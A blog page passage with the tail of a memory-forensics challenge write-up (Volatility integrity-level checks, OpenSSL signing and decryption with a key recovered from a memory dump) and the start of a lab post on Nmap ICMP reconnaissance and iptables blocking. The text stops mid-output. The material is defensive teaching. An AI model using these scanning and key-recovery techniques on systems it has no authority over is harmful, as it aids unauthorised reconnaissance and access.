</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What "Integrity Level" is being used by this/these "powershell.exe"?</div><div><b>A:</b> There are three powershell.exe at PIDs 2992,2252 and 4120 which are running at System Level privileges. </div><div><br /></div><div><b>Q:</b> What is/are the PID of the powershell.exe(s) with the highest "Integrity Level"?</div><div><b>A:</b> 2992, 4120</div><div><br /></div><div><b>Q:</b> What is the "Integrity Level SID" for this "Integrity Level"?</div><div><b>A:</b> S-1-16-16384</div><div><br /></div><div><b>Q:</b> What other "Integrity Levels" have we seen powershell.exe running with?</div><div><b>A:</b> High Mandatory Level</div></div><div><br /></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 2992 2252 4728 644 4852 4120 | grep --ignore-case Mandatory
2992 powershell.exe S-1-16-16384 System Mandatory Level
2252 powershell.exe S-1-16-16384 System Mandatory Level
4728 powershell.exe S-1-16-12288 High Mandatory Level
644 powershell.exe S-1-16-12288 High Mandatory Level
4852 powershell.exe S-1-16-12288 High Mandatory Level
4120 powershell.exe S-1-16-16384 System Mandatory Level</span>
</pre></div></div><div><br /></div></div><div><div>Well that's its for this challenge!</div><div><br /></div><div>With the understanding above, and if you completed the tasks above, these bonus questions should be relatively easy.</div><div><br /></div><div><b>Bonus question 1: Decrypt the file "encrypted_w_priv_key.enc" to find the phrase that pays.</b></div><div><br /></div><div>Here is how I encrypted the file using the private key, which means you need to use the public key to decrypt.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign -out encrypted_w_priv_key.enc</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>As always, I can verify the file's content is encrypted.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">hexdump --canonical encrypted_w_priv_key.enc
00000000 60 8a d3 84 6f 04 b3 4e 50 58 8a cd 59 88 1b e1 |`...o..NPX..Y...|
00000010 78 fb 5c 85 25 9a c9 4e da ad 64 ee 51 a1 3d 4b |x.\.%..N..d.Q.=K|
00000020 61 aa 44 4f a8 f9 92 9c 7d b6 5d 7b db c4 c1 83 |a.DO....}.]{....|
00000030 69 e5 6d 4a 79 b3 12 e8 fe fb bf 09 2a 5e 6f f6 |i.mJy.......*^o.|
00000040 37 52 01 84 df c6 01 31 ec d0 61 d0 a2 6f e7 46 |7R.....1..a..o.F|
00000050 ad 7a e6 b8 8d 89 31 1c fa 0c 65 35 65 74 21 d2 |.z....1...e5et!.|
00000060 77 d0 96 87 da e5 1b 3a 1f cf ae 40 27 cd 3f 31 |w......:...@'.?1|
00000070 f1 c2 3a 64 a7 9f 9a 98 59 f8 43 cf 09 75 19 88 |..:d....Y.C..u..|
00000080</span>
</pre></div></div><div><br /></div></div><div><div>Because we used the private key to encrypt, we need the public key to decrypt.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -hexdump -verify
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
0000 - 50 48 52 41 53 45 20 54-48 41 54 20 50 41 59 53 PHRASE THAT PAYS
0010 - 3a 2a 2a 70 75 62 6c 69-63 5f 6b 65 79 5f 64 65 :**public_key_de
0020 - 63 72 79 70 74 65 64 2a-2a 0a crypted**.</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Voila! There we go, we have decrypted the contents. I could have redirected it out to a file instead if needed such as.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -verify --out decrypted.txt
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat decrypted.txt
PHRASE THAT PAYS:**public_key_decrypted**</span>
</pre></div></div><div><br /></div></div><div>Ok! Caveat here for those that are paying attention!! I did not actually "encrypt" the data above, as I did not use the "<i>-encrypt</i>" option but instead "<i>-sign</i>". Signing and encrypting are two different things. </div><div><br /></div><div>With signing, the data is signed by using a hashing algorithm and the sender's private key. When we think hashing, we are thinking about a digest. This value will be fixed. Which means, every time I run the command "<i>echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign</i>" the output will always be the same. </div><div><br /></div><div>This is different from if I had done "<i>echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -encrypt</i>". This result in a different output every time, because of the random nature of encryption. Go ahead and test it for yourself.</div></div><div><br /></div><div><br /></div><div>While I cheated above, here is the actual encrypting and decrypting.</div><div><br /></div><div><div><b>Bonus question 2: Decrypt the file "encrypted_w_pub_key.enc" to find the phrase that pays.</b></div><div>Here is how I encrypted the file using the public key, which means you need to use the private key to decrypt.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">echo -e 'PHRASE THAT PAYS:**private_key_decrypted**' | </span><b><span style="color: #fcff01;">openssl pkeyutl -encrypt -inkey mem_server_pub.pem</span></b><span style="color: white;"> -pubin -out encrypted_w_pub_key.enc</span>
</pre></div></div><div><br /></div>While I created the contents on one line and encrypted it, we can still run <i>xxd </i>or <i>hexdump </i>or another hex editor on the file, to confirm its content is encrypted.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">hexdump --canonical encrypted_w_pub_key.enc
00000000 4f 3a 60 1b 9d 67 78 44 51 34 8e dd 8e a7 c6 04 |O:`..gxDQ4......|
00000010 13 5f e1 77 1f c1 b5 a4 30 f9 47 82 ad 0b 54 27 |._.w....0.G...T'|
00000020 dc 4b 74 7d 08 ea 6b 5b db 73 ad a6 a7 08 ea 14 |.Kt}..k[.s......|
00000030 72 d7 2e a0 7e 43 1a 6d 94 5a 03 83 ea 1c 01 9c |r...~C.m.Z......|
00000040 1d 67 84 7b 89 86 db 6b ea 78 c4 41 1d a1 ce 7c |.g.{...k.x.A...||
00000050 2f 91 15 ff b0 08 6c c8 bd 9b fe 88 c8 a9 f8 e6 |/.....l.........|
00000060 b3 ca 38 63 71 f8 61 7f 78 52 8a 96 be c6 f8 ac |..8cq.a.xR......|
00000070 a6 5b 8f 22 b9 59 3d cc 02 bf c8 ed f2 b9 aa ea |.[.".Y=.........|
00000080</span>
</pre></div></div><div><br /></div><div>With this confirmation, similarly to what we did above earlier, if we use the public key to encrypt, we then need the private key to decrypt. Let's do just that.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl pkeyutl </span><b><span style="color: #fcff01;">-decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat</span></b><span style="color: white;"> -in encrypted_w_pub_key.enc | hexdump --canonical
00000000 50 48 52 41 53 45 20 54 48 41 54 20 50 41 59 53 |PHRASE THAT PAYS|
00000010 3a 2a 2a 70 72 69 76 61 74 65 5f 64 65 79 5f 64 |:**private_key_d|
00000020 65 63 72 79 70 74 65 64 2a 2a 0a |ecrypted**.|
0000002b</span>
</pre></div></div><div><br /></div></div></div><div><div><br /></div><div>Voila! We have the phrase that pays, recovered in plain text.</div><div><br /></div><div>Hope you enjoyed this memory forensics challenge.</div></div></div></div></div><div><br /></div><div>References:</div><div><div><a href="https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf">CheatSheet_v2.4 (volatilityfoundation.org)</a></div><div><a href="https://blog.onfvp.com/post/volatility-cheatsheet/">Volatility 3 CheatSheet - onfvpBlog [Ashley Pearson]</a></div><div><a href="https://npcap.com/">Npcap: Windows Packet Capture Library & Driver</a></div><div><a href="https://volatility3.readthedocs.io/en/latest/getting-started-windows-tutorial.html">Windows Tutorial — Volatility 3 2.5.2 documentation</a></div><div><a href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/integrity-levels">Integrity Levels - HackTricks</a><br /><a href="https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/bb625963(v=msdn.10)">Windows Integrity Mechanism Design | Microsoft Learn</a><br /><a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers">Security identifiers | Microsoft Learn</a></div><div><a href="https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-components">SID Components - Win32 apps | Microsoft Learn</a></div><div><a href="https://www.malwarebytes.com/blog/news/2015/12/an-introduction-to-image-file-execution-options">An Introduction to Image File Execution Options | Malwarebytes Labs</a></div><div><a href="https://www.computerhope.com/unix/xxd.htm">Linux Xxd Command Help and Examples (computerhope.com)</a></div><div><a href="https://linux.die.net/man/1/xxd">xxd(1): make hexdump/do reverse - Linux man page (die.net)</a></div><div><a href="https://zeltser.com/media/docs/malware-analysis-remnux.pdf">zeltser.com/media/docs/malware-analysis-remnux.pdf</a></div><div><a href="https://www.first.org/resources/papers/conference2009/schuster-andreas-sliders.pdf">schuster-andreas-sliders.pdf (first.org)</a></div><div><a href="https://www.aldeid.com/wiki/Volatility">Volatility - aldeid</a></div><div><a href="https://docs.google.com/presentation/u/0/d/1KsZGF6cQ-N8ngABFGCZf8pTQQ5CZ19VoAHq5cO5ZPdE/htmlpresent?pli=1">Memory Forensics with Volatility. - Google Slides</a></div><div><a href="https://volatility3.readthedocs.io/en/stable/">Volatility 3 — Volatility 3 2.5.0 documentation</a></div><div><a href="https://github.com/volatilityfoundation/volatility/wiki/Command-Reference-Mal">Command Reference Mal · volatilityfoundation/volatility Wiki (github.com)</a></div><div><a href="https://web.archive.org/web/20121008220803/http://www.dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf">Wayback Machine (archive.org)</a></div><div><a href="https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys">Run and RunOnce Registry Keys - Win32 apps | Microsoft Learn</a></div><div><a href="https://www.man7.org/linux/man-pages/man1/ssh.1.html">ssh(1) - Linux manual page (man7.org)</a></div><div><a href="https://www.man7.org/linux/man-pages/man1/objdump.1.html">objdump(1) - Linux manual page (man7.org)</a></div><div><a href="https://www.tutorialspoint.com/assembly_programming/assembly_basic_syntax.htm">Assembly - Basic Syntax (tutorialspoint.com)</a></div><div><a href="https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header32">IMAGE_OPTIONAL_HEADER32 (winnt.h) - Win32 apps | Microsoft Learn</a></div><div><a href="https://blog.kowalczyk.info/articles/pefileformat.html">Portable Executable File Format (kowalczyk.info)</a></div><div><a href="https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/">A Comprehensive Guide To PE Structure, The Layman's Way (tech-zealots.com)</a></div><div><a href="https://www.securitynik.com/2015/07/windows-10-analyzing-filezillaexe.html">Learning by practicing: Windows 10 - Analyzing "FILEZILLA.EXE-93859B09.pf" prefetch file (securitynik.com)</a></div><div><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status#redirection_messages">HTTP response status codes - HTTP | MDN (mozilla.org)</a></div><div><a href="https://httpd.apache.org/docs/2.4/logs.html">Log Files - Apache HTTP Server Version 2.4</a></div><div><a href="https://curl.se/docs/releases.html">curl - Release Table</a></div><div><a href="https://stackoverflow.com/questions/63195304/difference-between-pem-crt-key-files">ssl - Difference between pem, crt, key files - Stack Overflow</a></div><div><a href="https://www.ssldragon.com/blog/pem-file/">What Is a .pem File? A Comprehensive Guide - SSL Dragon</a></div><div><a href="https://opensource.com/article/21/4/encryption-decryption-openssl">Encrypting and decrypting files with OpenSSL | Opensource.com</a></div><div><a href="https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/bb625963(v=msdn.10)">Windows Integrity Mechanism Design | Microsoft Learn</a></div><div><a href="https://stackoverflow.com/questions/13732826/convert-pem-to-crt-and-key">ssl - Convert .pem to .crt and .key - Stack Overflow</a></div><div><a href="https://blog.pleets.org/article/en/encryption-with-private-key-openssl">Asymmetric Cryptography in OpenSSL - Private Key (pleets.org)</a></div><div><a href="https://www.encryptionconsulting.com/education-center/encryption-and-signing/">What is the difference between Encryption and Signing? Why should you use digital signatures? | Encryption Consulting</a></div><div><a href="https://stackoverflow.com/questions/454048/what-is-the-difference-between-encrypting-and-signing-in-asymmetric-encryption">rsa - What is the difference between encrypting and signing in asymmetric encryption? - Stack Overflow</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-64767539112013545472024-01-31T07:49:00.000-08:002024-01-31T07:49:08.563-08:00Knock! Knock!! Anyone There? - Reconnaissance and Defense<p>In a recent session with our team as part of our <i>MDR Wednesdays</i> program, we were discussing reconnaissance and the usage of port 0. Not surprisingly, quite a few persons were surprised to hear about port 0 and its usage in reconnaissance. This blog post is meant as an additional resource, to aid the understanding. </p><p>One of the first steps, any threat actor will perform in any attack, is reconnaissance. It is the first column in the <a href="https://attack.mitre.org/" target="_blank">MITRE ATT&CK Framework</a> and similarly, it is the first task in the <a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html" target="_blank">Cyber Kill Chain</a>. That is how important this task is. This post is more around that "<i>active</i>" reconnaissance. To learn more about "<i>passive</i>" reconnaissance, see <a href="https://www.securitynik.com/2017/03/the-importance-of-reconnaissance-to.html" target="_blank">this link</a>.</p><p>Additionally, to make this more realistic, we will use the world's most popular network scanning/mapping tool Nmap. </p><p>Now let's be clear, if you are in an enterprise, I expect you have a security team and firewalls deployed to prevent some of these reconnaissance measures. At the same time, it is quite possible you are in an enterprise but have misconfigured firewalls. Who knows! If you are in a small business with no security team, I would not be surprised if you have not mitigated these reconnaissance measures.</p><p>Enough talking and let's get going. Before getting to why a threat actor may target port 0, let's start off with the regular reconnaissance.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> ________________ _______________</span>
<span style="color: white;">| THREAT ACTOR | | TARGET |</span>
<span style="color: white;">| 10.0.0.110 | --------->>> | 10.0.0.100 |</span>
<span style="color: white;">|_______________| |______________|</span>
</span></pre></div><p>Starting with the traditional "<i>ping"</i>. Running Nmap with the<i> -PE</i> option, we see from Nmap<br /></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><b><span style="color: #fcff01;">-PE</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 22:30 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<span style="color: white;">Host is up (0.00091s latency).</span>
<span style="color: white;">MAC Address: 00:0C:29:A2:BB:D7 (VMware)</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">1 host up</span></b><span style="color: white;">) scanned in 0.26 seconds</span></span>
</pre></div>
<p></p><p>How does Nmap knows the host is up? Well if we look at <i>tcpdump</i>, output on the TARGET we see the following.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><b><span style="color: #fcff01;">ICMP echo request</span></b><span style="color: white;">, id 59426, seq 0, length 8</span></span>
<span><span style="color: white;">IP 10.0.0.100 > 10.0.0.110: </span><b><span style="color: #fcff01;">ICMP echo reply</span></b><span style="color: white;">, id 59426, seq 0, length 8</span></span>
</pre></div>
<p></p><p>As you can see from above, the <i>echo request</i> had an <i>echo reply</i>. Let's now go ahead and block these ICMP echo request on the firewall to prevent this type of reconnaissance.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><b><span style="color: #fcff01;">--proto icmp</span></b><span style="color: white;"> --in-interface ens33 </span><b><span style="color: #fcff01;">--icmp-type 8/0</span></b><span style="color: white;"> --jump </span><span style="color: #fcff01;"><b>DROP</b></span></span>
</pre></div>
<p></p><p>The command above DROPs the packet. Note this is specific to ICMP Echo Request. Hence, the system will not respond with an ICMP Echo Reply.</p><p>Let's run Nmap again.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><b><span style="color: #fcff01;">-PE</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 22:47 EST</span>
<span style="color: white;">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span>
<span style="color: white;">Nmap done: 1 IP address (</span><span style="color: #fcff01;"><b>0 hosts up</b></span><span style="color: white;">) scanned in 2.08 seconds</span>
</pre></div>
<p></p><p>Now Nmap is reporting 0 host up. Let's see what was seen via <i>tcpdump</i> on the target.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><span style="color: #fcff01;"><b>ICMP echo request</b></span><span style="color: white;">, id 55102, seq 0, length 8</span>
<span><span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><b><span style="color: #fcff01;">ICMP echo request</span></b><span style="color: white;">, id 16092, seq 0, length 8</span></span>
</pre></div>
<p></p><p>Great, we see that even though the ICMP Echo Request came in, there was no ICMP Echo Reply. Hence the reason why Nmap reported the host is not up.</p><p>Confirming the firewall dropped this traffic.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b> 2 56 DROP icmp</b></span><span style="color: white;"> -- ens33 * 0.0.0.0/0 0.0.0.0/0 </span><span style="color: #fcff01;"><b>icmptype 8 code 0</b></span>
</pre></div>
<p></p><p>So we confirmed the firewall is now dropping this traffic. Great! But guess what, if you looked at Nmap <i><a href="https://linux.die.net/man/1/nmap" target="_blank">manpage</a></i>, you see there are other techniques available to target ICMP. Let's go ahead with another.</p><p>This time, we try the <i>Timestamp Request </i>method.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><span style="color: #fcff01;"><b>-PP</b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 22:59 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<span style="color: white;">Host is up (0.00072s latency).</span>
<span style="color: white;">MAC Address: 00:0C:29:A2:BB:D7 (VMware)</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">1 host up</span></b><span style="color: white;">) scanned in 0.14 seconds</span></span>
</pre></div>
<p></p><p>We see that the host is once again reported as up. We can also verify what Nmap received by looking at the target.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><b><span style="color: #fcff01;">ICMP time stamp query</span></b><span style="color: white;"> id 7808 seq 0, length 20</span></span>
<span><span style="color: white;">IP 10.0.0.100 > 10.0.0.110: </span><b><span style="color: #fcff01;">ICMP time stamp reply</span></b><span style="color: white;"> id 7808 seq 0: org 00:00:00.000, recv 03:59:38.965, xmit 03:59:38.965, length 20</span></span>
</pre></div>
<p></p><p>Great, so the pings we blocked did not prevent the ICMP reconnaissance so far. Let's now go ahead and block the <i>Timestamp Request</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><b><span style="color: #fcff01;">--proto icmp </span></b><span style="color: white;">--in-interface ens33 </span><b><span style="color: #fcff01;">--icmp-type 13/0</span></b><span style="color: white;"> --jump </span><b><span style="color: #fcff01;">DROP</span></b></span>
</pre></div>
<p></p><p>Trying the Timestamp reconnaissance again. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn -PP</span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 23:03 EST</span>
<span style="color: white;">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">0 hosts up</span></b><span style="color: white;">) scanned in 2.08 seconds</span></span>
</pre></div>
<p></p><p>Great, we seem to block this one also, as Nmap is once again reporting 0 host up.</p><p>Let's confirm at our firewall.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span style="color: white;"> 2 56 DROP icmp -- ens33 * 0.0.0.0/0 0.0.0.0/0 icmptype 8 code 0</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">2 80 DROP icmp</span></b><span style="color: white;"> -- ens33 * 0.0.0.0/0 0.0.0.0/0 </span><span style="color: #fcff01;"><b>icmptype 13 code 0</b></span></span>
</pre></div>
<p></p><p>Great we are now blocking the Timestamp request. But Nmap also have the netmask request discovery. Let's try the last of these Nmap methods.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><b><span style="color: #fcff01;">-PM</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 23:07 EST</span>
<span style="color: white;">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">0 hosts up</span></b><span style="color: white;">) scanned in 2.07 seconds</span></span>
</pre></div>
<p></p><p>Ooops! Nmap is reporting 0 host up. How could this be? We did not block this traffic. Let us see what the target host sees.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
